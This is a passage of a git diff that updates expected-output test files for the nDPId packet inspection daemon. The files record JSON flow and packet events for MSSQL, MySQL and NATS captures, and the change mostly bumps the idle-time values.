+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":14142,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":60,"global_ts_msec":1278068444666} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/mysql-8.pcap.out b/test/results/mysql-8.pcap.out index 814eefef6..cb3dfe61f 100644 --- a/test/results/mysql-8.pcap.out +++ b/test/results/mysql-8.pcap.out @@ -1,11 +1,11 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mysql-8.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946708780103} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946708780103,"flow_last_seen":946708780103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946708780103,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946708780103,"flow_last_seen":946708780103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946708780103,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":87,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946708780104} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 diff --git a/test/results/nats.pcap.out b/test/results/nats.pcap.out index c261f2552..934da384e 100644 --- a/test/results/nats.pcap.out +++ b/test/results/nats.pcap.out @@ -1,17 +1,17 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nats.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1586288040558} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040558,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} 